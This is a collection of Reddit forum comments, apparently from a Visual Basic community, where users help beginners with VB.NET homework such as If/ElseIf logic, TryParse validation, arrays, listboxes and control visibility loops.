get rid of all the = true If choice = "A" then 'is returning either true or false You have also nested "B" and "C" inside your first If statement so logically it will only check "B" and "C" if choice = "A" and since it would = "A" to get inside, The "B" and "C" checks will never be relevant. You have multiple ways of doing this, here's one example. If choice = "A" then set what you want for an A selection ElseIf choice = "B" then set what you want for a B selection ElseIf choice = "C" set what you want for C selection Else Respond that the input is not a correct option End if I would also recommend using choice.ToUpper so that if the user types "a" it will convert it to "A" for the comparison. I'll end it there so as not to give a complete solution to your assignment.
My Form design: [https://imgur.com/CCNLNXY](https://imgur.com/CCNLNXY) My code: [https://imgur.com/NBS0Vj8](https://imgur.com/NBS0Vj8) I used radio buttons because it's a more elegant user experience and easier to deal with the result. You'll notice I used an If statement to determine if the first radio button was selected (Excellent - RadioButton1) then I used two ElseIf statements within the If statement to determine if the other two radio buttons (Great - RadioButton2 or Regular - RadioButton3) were selected instead. Then I set the initial total right there. Then, I did another If statement to deal with the age. Lastly, I used a checkbox to add the required discount. It's important to recognize how your code is executed because in your original code, you were giving the discount before verifying the age. 
https://msdn.microsoft.com/en-us/library/system.datetime.ticks(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=vb#code-snippet-2 
Why would you basically do project for the OP? 
(On mobile so hard to see the code and write a proper response ) Do a nested if statement.
Use an Exit Sub, or Return (if it's a function), as soon as you hit a failure state (so after each msgBox). 
He already *did* the project - he just had an improperly nested if block and possibly had the logic out of order. I just wanted to show him another way to do it, that's all. If he's serious about learning he can compare both sources and it will help him determine what went wrong.
Understood. Just curious I like to figure things out and not be shown the answer Makes learning easier when you do it yourself But i will pm you if I get stuck on my vis basic homework!!!
Ah the early exit. Makes code so much easier to read. The alternative is to create an isValid variable that you can check at the bottom. But early exit is better.
First of all there is no need for that: 'intYear = CInt(txtYear.Text) 'intMonth = CInt(txtMonth.Text) 'intDay = CInt(txtDay.Text) as long as you do the other stuff(which makes sense since otherwise all the tryParse statements are useless) after all the TryParse since that already assigns the value. Also there is absolutely no reason to declare your years/months/days as Long. Int would be just fine(actually byte would be enough for an age). For actually calculating the age this is about as easy as it gets: Dim age As Integer = Now.Year - dtebirth.Year If (Now &lt; dtebirth.AddYears(age)) Then age -= 1 The Solution is from [here](https://stackoverflow.com/questions/2194999/how-to-calculate-an-age-based-on-a-birthday) and also gives an example on how to deal with it if someone would enter a date in the future. Btw you could just use a DateTimePicker for your date input since that would always return a valid date.
&gt; early exit is better. Both are valid, and I think it depends upon what the end goal is. There are case where you might still want to do something later in the routine, bun need to know the state of previous conditions, or need to return an object or variable rather than just exiting, so using an isValid variable to check later would be perfect. Depending upon the complexity of the routine, it might also be cleaner to only have one exit point, rather than multiple exit points. 
 Private Function GetError() As String Dim Fname as String = TextBox5.Text Dim Lname as String = TextBox2.Text Dim Postcode as String = TextBox1.Text Dim Cardnumber as String = TextBox4.Text If Fname = "" then Return "You did not enter a First Name!" If Lname = "" then Return "You did not enter a Last Name!" If NameError(LCase(Fname)) = True then Return "Please enter..." If NameError(LCase(Lname)) = True then Return "Please enter..." If CheckPostcode(LCase(Postcode)) = True then Return "Your postcode is invalid..." Return "" End Function Then in your main code: Dim ErrorMessage as string = GetError() If ErrorMessage &lt;&gt; "" Then Msgbox(ErrorMessage) Exit Sub End If
I'm a little late to this party, but you might consider trying something like this. I like to build an error message string when multiple error conditions can occur at the same time, and then display a single message with the error(s) to the user. I use a Boolean variable to store whether or not an error condition occurred, and then I can use that Boolean flag to determine which process to run (normal or error). Hopefully that makes sense. I used Trim to get rid of any extra new lines in case the first error condition didn't trigger -- having those new lines in the 2nd &amp; 3rd error strings makes it obvious to the user that they have more than one input error (if applicable). I haven't run this code myself, and I'm doing it mostly from memory of past experience. Hopefully I didn't goof it up. Dim Fname, Lname, Postcode, CardNumber As String Dim strErrorMessage, strErrFname, strErrLname, strrErrPostcode As String Dim blnErrFlag as Boolean strErrFname = "The first name is invalid." &amp; vbNewLine &amp; "It must only contain letters." &amp; vbNewLine &amp; "E.G. John" strErrLname = vbNewLine &amp; vbNewLine &amp; "The last name is invalid." &amp; vbNewLine &amp; "It must only contain letters." &amp; vbNewLine &amp; "E.G. Smith" strErrPostcode = vbNewLine &amp; vbNewLine &amp; "The postcode is invalid." &amp; vbNewLine &amp; "Please make sure you include the space and try again." &amp; vbNewLine &amp; "E.G. 'BT71 6GH'" Fname = TextBox5.Text Lname = TextBox2.Text Postcode = TextBox1.Text Cardnumber = TextBox4.Text strErrorMessage = "" blnErrFlag = False If NameError(LCase(Fname)) = True Then blnErrFlag = True strErrorMessage = strErrFname End If If NameError(LCase(Lname)) = True Then blnErrFlag = True strErrorMessage = strErrorMessage &amp; strErrLname End If If CheckPostcode(LCase(Postcode)) = True Then blnErrFlag = True strErrorMessage = strErrorMessage &amp; strErrPostCode End If If blnErrFlag Then MsgBox prompt:= Trim(strErrorMessage), title:="The system cannot process your request because there are problems with your input." Else CheckValidDate() CheckCardNumber(CInt(CardNumber)) End If
On a side note: Don't give users a single message for each error. That's annoying a F. Instead when each item fails validation create a message that shows all values (1 or more) fields needing attention. Dim sIssues as String = "" Dim bError as Boolean = false; If NameError(LCase(Fname)) = True Then bError = true sIssues + = "* First Name" End if If NameError(LCase(Lname)) = True Then bError = true sIssues + = "* Last Name" End If If (bError) Then MsgBox("The following fields need attention." &amp; vbNewLine &amp; sIssues) End If
Was able to get a work around by calling a Python script that would evaluate the string. Wasn't sure how to pass the data between VB and Python so i was writing to a text file between the two. had to put in a half second delay before and after calling the script to make sure the processes were finished with the text file. Seeing as I had to do this over 300 times it really added up the time it took the program to run. I was looking around today for ways to pass the variables between VB and Python and found that there is a built in reference called MSScriptControl that will allow me to do the evaluation in VB. [Link to the thread](https://social.msdn.microsoft.com/Forums/vstudio/en-US/bd98ee68-f5c6-48d9-b03b-2304d22158a9/convert-string-to-equation?forum=vbgeneral)
I found [this thread](https://social.msdn.microsoft.com/Forums/vstudio/en-US/bd98ee68-f5c6-48d9-b03b-2304d22158a9/convert-string-to-equation?forum=vbgeneral) today talked about the built in reference called MSScriptControl.
Are you saying on sheet 2 you have headers of dates and you want excel to count the event entries under that date header that matches the date chosen on page 1? If thats the case, Excel should be able to do that without VBA.
I'm gonna suggest one more thing. add a check with the age that will return a null value if age&lt;legal driving age you don't want that as a possibility 
thank you for your help! i've been working on this and have my updated code. https://paste.ubuntu.com/25976709/
One month old account with no karma and no information regarding the project. Thanks buddy. r/SlaveLabour is that way. 
Also, as someone who has been with VB since 2.0 and has had to work with too many people who didn't have a f;in clue... do your own homework. You need to learn these things
Why are you replying to me? What did I do? I know VB. &lt;3
I was just agreeing with your point, with details about why.. not blaming you. You're cool.
Oh okay. That’s why I had the heart. I figured I was overreacting. Have a wonderful day, buddy. 
The whole point of PMing me was for the details of the project, but yeah man one month old account and no reddit karma, you got me bro.
Why do we have to PM you? We have no reason to trust that you would pay. There are plenty of other sites for you to ask for work as well. 
Idk man, but lets keep commenting back to each other and down-voting each other's reply!
Actually haven’t downvoted you. So, have a wonderful evening =D
on sheet 2 i have a list of elements and i wanna countif(A2:A100, "A"), etc. the elements of this list and display the results on sheet 1, under the date linked to the one in the sheet 2. I need an algorithm that can do that. 
Does the date relate somehow to the function you want? You can reference the other sheet by selecting the range as you type in the function. It will look like this "=COUNTIF(Sheet2!A127:A202,"A")" on Sheet1.
* create a variable to store value * create variable the stores total number of values entered * create button and on the click of the button add the value of the text box to the variable that stores the value. Increment the total number of values * calculate the average using the stored values. * insert calculated value into textbox 
You should add a way to mute the sound. People might want that option. Other than that, it's pretty cool. How long did it take you to make that?
Oh yeah. Mute button. Forgot about that. Whoops. I'll add it in. Thanks. I got the idea yesterday morning. Took about 8 hours of coding, including a complete overhaul from the first version. 
You realize the odds of getting a "Perfect Game" on level 6 goes up into 900 quintillion range, right? I don't even want to do the math on anything above that. My calculator would crash. 
LMAO! Well, just do your best. My best score for level 6 is 148. Level 12 took me like 1300 clicks. 
I want two macros on one cell: a hyperlink between two different cells in two different sheets and on the same button, an occurence counter. 
Does not show overclocked speed, just factory speed. Have you actually read the title?
Fix this https://ufile.io/wy61e
Paste your code, not just a picture. (Or if you must use a picture, at least turn on line numbers.)
It's the same every time because you use the same inputs every time. You never change dblDeposit. 
Public Class frmMain Private Function CalculateNewBalance(ByVal deposit As Double, ByVal interestrate As Integer, ByVal years As Integer) As Double Dim balance As Double balance = deposit * Math.Pow((1 + interestrate), years) Return balance End Function Private Sub btnCalculate_Click(sender As Object, e As EventArgs) Handles btnCalculate.Click 'calculate balances for each of the five years 'display all balances from each year using 2%, 3%, and 4% Dim dblDeposit As Double Dim dblBalances As Double Double.TryParse(txtInitialDeposit.Text, dblDeposit) txtDisplayBalances.Text = "Rate" &amp; ControlChars.Tab &amp; "Year" &amp; ControlChars.Tab &amp; "Balance" &amp; ControlChars.NewLine 'calculate the balances For dblInterestRate As Double = 0.02 To 0.04 Step 0.01 txtDisplayBalances.Text = txtDisplayBalances.Text &amp; dblInterestRate.ToString("p0") &amp; ControlChars.NewLine For intYear As Integer = 1 To 5 dblBalances = CalculateNewBalance(dblDeposit, dblInterestRate, intYear) txtDisplayBalances.Text = txtDisplayBalances.Text &amp; ControlChars.Tab &amp; intYear.ToString &amp; ControlChars.Tab &amp; dblBalances.ToString("c2") &amp; ControlChars.NewLine Next intYear Next dblInterestRate End Sub 
Dim balance As Double balance = deposit * Math.Pow((1 + interestrate), years) Return balance Dim dblDeposit As Double Dim dblBalances As Double Double.TryParse(txtInitialDeposit.Text, dblDeposit) txtDisplayBalances.Text = "Rate" &amp; ControlChars.Tab &amp; "Year" &amp; ControlChars.Tab &amp; "Balance" &amp; ControlChars.NewLine 'calculate the balances For dblInterestRate As Double = 0.02 To 0.04 Step 0.01 txtDisplayBalances.Text = txtDisplayBalances.Text &amp; dblInterestRate.ToString("p0") &amp; ControlChars.NewLine For intYear As Integer = 1 To 5 dblBalances = CalculateNewBalance(dblDeposit, dblInterestRate, intYear) txtDisplayBalances.Text = txtDisplayBalances.Text &amp; ControlChars.Tab &amp; intYear.ToString &amp; ControlChars.Tab &amp; dblBalances.ToString("c2") &amp; ControlChars.NewLine Next intYear Next dblInterestRate
Heres with numbered lines: [https://imgur.com/794TWjn](https://imgur.com/794TWjn)
HAHAHA IVE DONE IT!!!!!!! Public Class frmMain Private Function calcbalance(ByVal principle As Double, ByVal annualrate As Double, ByVal years As Integer) As Double Return principle * (1 + annualrate) ^ years End Function Private Sub btnCalculate_Click(sender As Object, e As EventArgs) Handles btnCalculate.Click 'calculate balances for each of the five years 'display all balances from each year using 2%, 3%, and 4% Dim dblDeposit As Double Dim dblBalances As Double Double.TryParse(txtInitialDeposit.Text, dblDeposit) txtDisplayBalances.Text = "Rate" &amp; ControlChars.Tab &amp; "Year" &amp; ControlChars.Tab &amp; "Balance" &amp; ControlChars.NewLine 'calculate the balances For dblInterestRate As Double = 0.02 To 0.04 Step 0.01 txtDisplayBalances.Text = txtDisplayBalances.Text &amp; dblInterestRate.ToString("p0") &amp; ControlChars.NewLine For intYear As Integer = 1 To 5 dblBalances = calcbalance(dblDeposit, dblInterestRate, intYear) txtDisplayBalances.Text = txtDisplayBalances.Text &amp; ControlChars.Tab &amp; intYear.ToString &amp; ControlChars.Tab &amp; dblBalances.ToString("c2") &amp; ControlChars.NewLine Next intYear Next dblInterestRate End Sub
That doesn't make sense to me. Not having any more ofmyour code, this makes more sense but I'm. Ot sure if it's even possible. WebBrowser1.Document.GetElementById("id_email") = WebBrowser2.Document.GetElementById("mailAddress") 
Thanks for the post. This is the content we need.
well you need an iterator that goes through each of the values in your storage array. something like Dim tArray() As String = {"a", "b", "c", "d"} For Each item In tArray ListBox1.Items.Add(item.ToString) Next
 Private Sub Sizebox_KeyPress(ByVal sender As System.Object, ByVal e As System.Windows.Forms.KeyPressEventArgs) Handles Sizebox.KeyPress If Char.IsDigit(e.KeyChar) = False And Char.IsControl(e.KeyChar) = False Then e.Handled = True End If End Sub Add that subroutine to your code to limit your text input to numbers only in Sizebox. You might want to set the ShortcutsEnabled property of the SizeBox to "False" on your form also (to prevent pasting text, which wouldn't be caught by this subroutine). 
Thank you, but I'm actually supposed to enter in the sales amounts, which go to the array. I have the sales IDs as items in the listbox. Unless I'm misunderstanding, I don't think this will assign the elements in the array to the items in the listbox. 
Ok, I will give you a hint. So, the manager select a saleperson and enters their sales. You need to match up what the manager selects in the listbox, meaning which sales person, to which element in your one-dimensional array. Use the .SelectedIndex of the listbox. it's zero based and will then match up to the sales in the array. Double.TryParse(enterSalesTextBox.Text, salesMade(salesIDListBox.SelectedIndex)) Sales person "101" in listbox item 0 will have totals in element 0 of the salesmade array.
CInt assumes that you will pass it a valid integer value. If you pass it anything that can't be converted to an integer, it will throw an error. Integer.TryParse is the tool you should be using here, as it will try to convert it to an integer without an error. If it's successful, the result variable passed in will contain the new integer. 
it is a two step process the first part is based on the button click event to fill the array you are processing into the listbox. Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click ' ReDim Preserve tArray(tArray.Count + 1) ' old way still works Array.Resize(tArray, tArray.Count + 1) ' modern way tArray(tArray.Count - 1) = TextBox1.Text.ToString ' call a function that fills the list box shown in previous example. FillListBox(tArray) End Sub The better way would be just to use the built in collection on the listbox. Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click ListBox1.Items.Add(TextBox1.Text.ToString) TextBox1.Text = "" ' this is good practice TextBox1.Select() ' this sets the input back to the textbox allowing somebody to just enter a series of values by typing and pressing return. End Sub The only reason to use an array would be because they told you to :) 
Yes, they need me to use an array to hold the sales amounts. And I'm confused by what you mean by "ReDim Preserve". 
Its commented out man. Use the Array.Resize method. 
you are most welcome
OK, I think I understand this. But would this only cover the first element (0)? Because I would think if I kept typing in input, then eventually it would have nowhere to go, or it might replace the values I have in the array already. Unless you mean I should put this statement in my Do loop. 
Remove takes integers for start and length. Why not use replace? strSent = strSent.Replace(strRemove, "") PS. If you remove just the word, you might be left with a double space. 
 If sentenceTxt.Text.Contains(WordTxt.Text) Then sentenceTxt.Text = sentenceTxt.Text.Replace(WordTxt.Text, String.Empty) End If
yes, i agree but when we use string.empty it replaces the word with no space
 ' You can type code on reddit by adding 4 spaces ' before a line of text. 
Also, don't forget to add: Trim(strRemove) If the user accidentally adds spaces in the remove box, it will really bugger up the output. 
The problem is with the elseif statements. It's only checking one option and skipping the rest. You have to do the checks one at a time, so that it checks everything. And you have to Exit Sub when it finds an error in user input. That way it doesn't keep checking for other things and possibly try to process bad input. If Sizebox.Text = "" Then MsgBox("Please enter a whole number", MsgBoxStyle.OkOnly) Sizebox.Focus() Sizebox.SelectAll() Exit Sub End If If Not IsNumeric(sizebox.text) Then MsgBox("Please enter a whole number", MsgBoxStyle.OkOnly) Sizebox.Focus() Exit Sub End If If CInt(Sizebox.Text) &lt;= 0 Then MsgBox("please enter a whole number greater than 0", MsgBoxStyle.OkOnly) Sizebox.Focus() Sizebox.SelectAll() Exit Sub End If
Useful information, but I had to mute that music. Dude needs to get a microphone and talk people through it. 
Oh, sorry. It was a bit confusing to read. Thanks for clearing it up. 
its all good man, we are all here to figure this stuff out.
Yes... i Thought of doing so, may be in the next video :)
Why would I need to resize the array though? I already know that I need 5 elements. 
You don't have to if you only need 5. The example was for n number of elements.
are the standard assemblies not loaded in the gac? is the correct .net framework installed on the iis server?
Yes, assemblies are loaded. running ASP.net 4 On Dev we never have this problem, its only on Live and occasionally.
I am confused all I have ever had to do in .Net to instantiate a control in code behind is; dim newlistbox as new listbox Not sure why you would have to go through loading the controls from a file location. I would suggest that the production environment is different from the test environment. Are the web.config file the same in both cases? (dev, and production) 
especially if it's occasional, suggests a configuration problem where it usually is pre-loaded somewhere else but sometimes not.
I'm not supposed to press the button to create the array. I need to load the values from a textbox to the listbox's items. From there, those listbox items, as well the values seperately are printed in another textbox when the createReportButton is pressed. 
Sorry, I looked into this and I think I do understand it a bit more. 
UPDATE: I've updated the code. Here is the newest version: https://pastebin.com/DgSfY1Qf My confusion in the logic was trying to assign the arrays' values to the items in the listbox. That wouldn't make much sense, and if it did, I imagine converting back and forth from strings to other types would be a pain. This is still a work in progress, as the array elements and list-box items still need to be outputted to the other text-box in the program. 
I didnt think it was large? I thought it was a network installer and you only select the things you want to install
Its an all inclusive package, you download the entire thing every time. For VB.Net there is really nothing else. I guess you could write in your favorite text editor and compile on the command line. There is Mono and SharpDevelop.
What’s the actual assignment question?
You will need to give more information, I can't help you without knowing what Customer is and what the byName boolean is for. I also have no idea what the string to return would be.
Sorry for the lack of information, im currently at work so icant give the actual information but i will explain of what i remember There are two classes CLASS TTCALL Public&amp;private callID -&gt; unique callID Public&amp;private NumberCalled -&gt; the number that call Public&amp;private Duration -&gt; the time it took Public&amp;private cost Public&amp;private Calltype Function Tostring() Return NumberCalled, calltype, duration and cost CLASS CUSTOMER public&amp;private customerName Public&amp;private CallerID -&gt; phone number Public&amp;private Calls As TTCALL list -&gt; list of TTCall.Tostring() So, back to the function, it is used to find a certain customer from List(of Customer) if any. If byName is true then search as customer name. The example output is like this 99993333, Bob Smith -&gt; callerID &amp;CustomerName from Customer Class If not search by TTCall.CallID showing example output like this; 444455674, mobile, 3:20, $1.70 444367274, NAT, 2:40, $2.50 Sorry if its confusing i will send the actual question and code i got soon i come home. I really appreciate it for you guys whi tried to help :)
This is the actual question 3) The findCustomer method should search an array of Customer objects for a specific customer. This method has the following signature: Public Shared Function FindCustomer(ByVal customers As List(Of Customer), ByVal search As String, ByVal byName As Boolean) As String FindCustomer inspects the list passed to it for the customer specified in search returning a String that shows the Customer and TTCall details, if any. If byName is true then search is applied to the customerName field, otherwise it is used to search the callerID field. If the customer does not exist, return an empty string. A sample return value follows: 99993333, Bob Brown 0444111222, Mobile, 03:15, $3.70 0434222333, Mobile, 00:07, $0.13 0444121212, Mobile, 00:15, $0.28 0454212122, Mobile, 04:51, $5.53
Use `And` or `Or` for bitwise operations.
Rates shouldn't stores the actual rates, as that may change over time.
Thats what i actually did, but as it is an assignment the teacher doesnt want me to use case but make it an enum or constant instead
Sigh, another idiot teacher who thinks case statments are "evil", then makes people recreate them with if-else-if statements. Do whatever makes him happy, but remember you did it the right way first.
Some rough code for searching through the list ' If you don't want to use For loop, take a look at ' https://msdn.microsoft.com/en-us/library/6sh2ey19(v=vs.110).aspx ' Loop through customer list to find customer For Each customer As Customer In customers If byName And customer.customerName = search Then ' Do stuff here Return some_string ElseIf Not byName And customer.callerID = search Then ' Do stuff here Return some_string End If Next ' No match Return ""
You can create a temporary Point variable to store the location of one of the PictureBoxes. Dim Location1 As New Point Location1 = PictureBox1.Location PictureBox1.Location = PictureBox3.Location PictureBox3.Location = Location1 (I'm on mobile, in case any of the code is incorrectly formatted. Also because of this I couldn't test the code.)
You could also create a function that does this for all pictureboxes: Sub Swap(pb1 as picturebox, pb2 as picturebox) Dim p1, p2 as new point p1=pb1.Location:p2=pb2.Location pb1.Location=p2:pb2.Location=p1 End Sub Call the sub using: Swap(PictureBox1, PictureBox3)
hi thanks, your code is work for me. really appreciate it :)
Alright thanks Ill try that! Ill give you news on that thank you very Much 
It does work but i can't see how i can make it cover the whole board. Like i need a sort of shuffle that will move all of my picturebox from their local location.
Ok so I have a problem I have a really weird problem. So I created a new class which is a new type of TextBox. It keeps track of the objects created from it with the help of a list but. This all works, with for each I can get all objects of the class but when I want to convert the string from the TextBox into a integer I can't do it because it thinks its not convertable eventhought the string only consists out of number symbols
What is the error exactly? I tried your code and it worked unless TextBox1 did not contain a valid number for example it just being empty will trigger an exception.(Also why are you saving the complete TextBox? Seems a bit wasteful)
What's the exception?
Ok I solved it xD I completly fergot the result textbox had no real value when nothing was entered in it
Why are you trying to add a handler manually? Just use the built in handler for the textChanged event (it probably has a different signature than the keyPress event does).
 Try running your loop from the end item to the beginning item for i as integer = ObjectList.count to 1 step -1 do stuff - if conditions exists then ObjectList.Add(new object) next 
What is the model # of the RFID reader?
You may be overusing enums for your "enum rates" - this looks like a "lookup" value instead of a discrete type. How about a getRate function that returns the rate based on the calltype enum passed to it? In real applications, rates change over time but call types are usually constant (or maybe you add a new call type) - so it's best to use a function call to get the rate. Eventually, this rate may be time dependent such as the rate for from Jan 1-Feb 20 = .087 but then there is a rate increase. So things like rates may need to be persisted in a database or retrieved by a web call
That will be a good way but in this assignment it is required to use enum or constant. In the next part i have to make a callDescriptiom array, this is the question for the next part -- Define a calldescription array that holds longer descriptions of each of the calltypes in the enumeration; i.e. "International Rate" where the enum is ISD_RATE. So yeah thats why i cant use function or case statement and my brain just cant process how to do it😖
Try wrapping `CDbl()` around your get values section lines, it may not fix it but I suspect a nun-numeric in one of those fields if any of height,length,number are 0 then yes all you will see is other
You need to: 1) setup a database server 2) setup the database for remote, secure access (assuming your app is going to run on people’s home computers) 3) write up your queries to do the CRUD (Create, Read, Update, Delete) operations on your database objects. 4) write up an app that can access your database and use the CRUD operations I would suggest learning how to write a web application with a database back-end. There are some good ASP.NET tutorials out there using test databases but you still have to set those up, so you will still need to set up a database server. What language do you plan
so use an error handler label in which you test the error number and set the value and either `resume next` or make a new label to resume to.
https://docs.microsoft.com/en-us/dotnet/api/system.string.contains?view=netframework-4.7#System_String_Contains_System_String_
display refreshing (technically, processing of window messages, which includes the message to repaint the form) happens during idle time. call `Application.DoEvents()` to process window messages at the point you want it updated. 
I don't think do events is a member in wpf.
Haha bro. Not trying to be a dick. I'm taking a c # class now. Is the only difference syntax? If you can do everything with either launguage why would it even matter programming in either or?
Reputation. C# sounds professional. It has a C-like language, and C is what hard core programmers use. Meanwhile VB has the word "basic" in its name. Clearly it's meant for beginners and not true programmers. And remember all those badly written VB6 programs? Clearly we need a programming language that's too hard for novices. *** Jokes aside, VB was more advanced than C# for the first decade or so. C# didn't catch up until it got the dynamic keyword and only recently surpassed VB in terms of capabilities. And it still lacks VB's awesome support for dealing with XML. 
But it throw an exception then. Still a good idea to check for numeric input. But the reason it's not working here is, that you don't change the value of the numberofwalls so it stays 0 and therefore you only get the otherwallspace.
You have to use a thread to manage updates in wpf. Easiest way is to use the Dispatch class ThreadPool.QueueUserWorkItem(Function(o) Dispatcher.Invoke(DirectCast(Function() InlineAssignHelper(Textbox1.text, "whatever"), Action))
Are you importing a library? 
Cool. I tried implementing the code, however inlineassignhelper is not declared. Is that a function or property? Thanks
Mod is the same as a remainder when dividing. So 5 mod 2 would be 1 because 5/2 = 2 remainder 1 and 6 mod 2 is 0 because 6/2 = 3 remainder 0. You keep dividing by 2 or whatever multiple you need and use the mod to help with your conversion.
Hope this Help, if you want to use MS Access https://youtu.be/4cdwqPdtlI8 
number of walls appears to be zero all the time. so this is always zero. (decheightcalc * declengthcalc) * (Decnumberofwalls) All you are ever left with is + decotherwallspace 
The CInts are not necessary. TryParse saves the converted value in the 2nd parameter if it can be parsed. You also shouldn't nest the 2nd TryParse inside the first one. Do them both no matter what. Then if either of them fails, just punt (exit the function). Set a flag variable if a TryParse fails.
Thanks man, I'll give that a shot.
Let's say ComboBox1.Text = "iPhone", ComboBox2.Text = "iPhone 2G" and ComboBox3.Text = "iOS 1.0", your IF statement will evaluate as: If ComboBox1.Text.Contains("iPhone") And ComboBox2.Text.Contains("iPhone 2G") And ComboBox3.Text.Contains("iOS 1.0") ' (true) And (true) And (true) - will not go to ElseIf Now if ComboBox3.Text is changed to = "iOS 1.0.1" then the same IF statement will evaluate as: If ComboBox1.Text.Contains("iPhone") And ComboBox2.Text.Contains("iPhone 2G") And ComboBox3.Text.Contains("iOS 1.0") ' (true) And (true) And (true) - will not go to ElseIf Why? "iOS 1.0.1" -&gt; ComboBox3.Text.Contains("iOS 1.0") = TRUE That text still contains "iOS 1.0", therefore it will evaluate as true and therefore not go into your ElseIf block! The fix? Just change your IFs around: If ComboBox1.Text.Contains("iPhone") And ComboBox2.Text.Contains("iPhone 2G") And ComboBox3.Text.Contains("iOS 1.0.1") Then .... ElseIf ComboBox1.Text.Contains("iPhone") And ComboBox2.Text.Contains("iPhone 2G") And ComboBox3.Text.Contains("iOS 1.0") Then .... Just note that you might still run into these problems in the future - you might want to change your Contains into Equals instead so you are relying on exact matching...
 Dim scoretotal As Integer Dim scorecount As Integer 'Dim scoreHolder(19) As String Dim scoreHolder(19) As Integer Private Sub btnAdd_Click(sender As Object, e As EventArgs) Handles btnAdd.Click Dim score As Integer = CInt(txtScore.Text) Dim average As Integer 'Dim scoresHeld As Integer If IsNumeric(score) AndAlso score &lt;= 100 Then '+++ ' Store the score in the array ' scoreHolder is only 20 integers. scoreHolder(scorecount) = score '--- scoretotal = scoretotal + score scorecount = scorecount + 1 average = scoretotal / scorecount txtScoreCount.Text = scorecount txtScoreTotal.Text = scoretotal txtAverage.Text = average txtScore.Select() 'Dim numberString As String = "" For i As Integer = 0 To scorecount - 1 If scoreHolder(i) &gt; 0 Then TextBox1.Text &amp;= scoreHolder(i).ToString &amp; ", " End If Next 'MessageBox.Show(numberString, "numbers tezt") 'scoresHeld = scoreHolder(scorecount) 'MsgBox(scoresHeld) End If End Sub 
You could also accomplish this by using IsNumeric().
&gt;How would I go about determining all the possibilities of breaking down a value (say, 19) into combinations of smaller values (say, 1, 12, 13, 16)? Recursive subtraction seems obvious, but when moving 'up' a level of recursion, it all goes to pot. Can you clarify a bit on what you mean? If you're trying to get the numbers from a pre-determined list which sum up to a specific number, this problem is NP hard. Are you allowing duplicates? (i.e. 16,1,1,1) = 19?
IsNumeric will return true for values that will fail a conversion to Integer.
Values entered from a user control such as a textbox? I was unable to get IsNumeric() to return a false positive when passing it a non-numeric string value.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit: - [/r/csharp] [C#'s free and lightweight debugging aid, now available for VB.NET • r\/visualbasic](https://www.reddit.com/r/csharp/comments/7g5o48/cs_free_and_lightweight_debugging_aid_now/) - [/r/dotnet] [C#'s free and lightweight debugging aid, now available for VB.NET • r\/visualbasic](https://www.reddit.com/r/dotnet/comments/7g5o1h/cs_free_and_lightweight_debugging_aid_now/) &amp;nbsp;*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*
This is kinda cool, I downloaded it to check it out. I mean you can get all this data in break mode. But having it at the code is faster.
Turn visible to false on all the buttons you affected Make an if statement or a case statement with whatever parameter you want. In the action part, change the visibility to true if it meets it.
It won't return a false positive, but it's not a good way to decide if a text value is a valid _Integer_, since it also checks for Double, Decimal, Long, ULong, and any number of string conversions that might be valid numbers (including hex and octal numbers, and numeric symbols). The following strings will all pass IsNumeric but will fail Integer.TryParse (and do different things with CInt). "1.5"; CInt will round to 2 "1,90"; CInt will strip the comma and return 190 (not sure if it changes when the Locale uses a comma instead of a decimal for fractions, in which case it would return 2) "&amp;H20"; CInt will convert to 32 "2147483648" (or anything larger); CInt will overflow "2-"; CInt will convert to -2 All of those are valid numeric formats, but not necessarily valid Integers. 
I figured that much, but isn't their a more efficient way? For example: the user choses 10 (this is max for my program), so also 10 buttons that are set to visible=false. Don't I have to create a 10 part nested if? Seems a bit odd. I assumed this wasn't effient...
Create a function to validate the number and do what you need. (Doing this on mobile and haven't work with VB for a while so there maybe some C# syntax in here) If NumberValidated() then Messagebox.show("successful") ' for debugging Else Message box.show("Fail not a number") ' for debugging End if Private Boolean NumberValidated() Integer parsedNumber If tryparse( NumberTextBox.text, parsedNumber) then If passedNumber = 0 then Return false End of If passedNumber =&lt; 1 then Btn1.visible = true End if If passedNumber =&lt; 2 then Btn2.visible = true End if 'etc Else Return false End if 
cheers, i'll try this and figure it out!
You can actually use the control collection with a naming convention to loop through and set the visible property. First, name your buttons btn1, btn2, ... btn10 ... Assume you've already handled the max and have stored the valid user input into an integer called numButtons. All you would have to do at this point is create a loop from 1 to numButtons and find "btn" &amp; x (or whatever iterator variable you use) in the control collection For x as Integer = 1 to numButtons Me.Controls("btn" &amp; x).Visible = True Next So if 2 was entered, the 1st iteration of the loop looks for btn1 in the controls collection and if found, sets its visible property to True the 2nd iteration, x = 2 so this will search for "btn2" and again, if found will set its visible property to True
If have you any questions about any part of the code, feel free to ask.
Waw, I'm going to try all the codes, but this one is so simple and does the job. Never knew about Me.Controls, but I'm pretty sure it will be useful in the future too. Cheers. 3 lines of code versus 10 times as much with a nested if. Thank
Yea, just keep in mind that if you try to pass a control name in that does not exist in the collection you will get a NullReferenceException. So make sure you handle the user input to ensure this doesn't happen.
VC Basic is not the same as true Visual Basic. It appears to be an extension to /r/VBA
Ahh ok thanks for the reply. It is really difficult finding online resources for VCBASIC. 
Its not too uncommon for some older applications to use Visual Basic for Applications - its more of a scripting language than "visual" basic was. Based on the doc you provided that's what it looks like, VBA. They only added a few custom functions of their own on top of it Does crystal view allow you to create controls such as an empty combobox? The syntax if I remember was just combobox1.additem "1222"
Yeah it does allow for various styles of comboboxes. I subscribed to the sub that /u/EkriirKe/ provided. From what I've seen so far, there's a lot of Excel questions so I just may find what I want. 
says it's only for 2017 tho. :(
Cool stuff, but the "Register to our newsletter" spam that opens almost every time, with an option of "Not now" and "OK", which means there is no way to dismiss it forever is kinda shitty.
Why not use 2017 though? It's imo the best version yet.
And community edition is free.
